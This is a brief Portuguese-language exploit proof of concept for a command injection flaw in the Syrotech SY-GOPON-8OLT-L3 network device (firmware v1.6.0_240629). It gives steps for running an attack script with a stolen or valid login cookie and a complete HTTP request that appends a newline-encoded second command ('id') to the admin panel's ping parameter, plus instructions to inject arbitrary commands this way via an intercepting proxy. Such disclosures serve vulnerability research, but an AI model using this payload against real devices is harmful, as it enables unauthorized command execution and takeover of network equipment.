
Prova de conceito de exploit para uma vulnerabilidade de injeção de comandos no Syrotech SY-GOPON-8OLT-L3, permitindo execução arbitrária de comandos por meio da manipulação de requisições HTTP.
Syrotech SY-GOPON-8OLT-L3 v1.6.0_240629 Vulnerabilidade de Injeção de Comandos
1- Edite a URL no script.
2- Edite o valor de Cookie_Login no script.
3- Execute o script, ele permitirá que você execute comandos.
GET /cgi/home.php?fun=system&page=shellCMDExec&isajax=1&runtab=1&cmdExec=1&command=ping%208.8.8.8%20-c%204%0aid&random=1725991418844 HTTP/1.1
Normalmente, apenas o comando ping é permitido ser executado no painel de administração.
Se você interceptar a requisição com um proxy, adicione um byte de nova linha ao final do parâmetro do comando e digite o comando que deseja executar, isso permitirá que você execute outro comando.
Mehmet Demir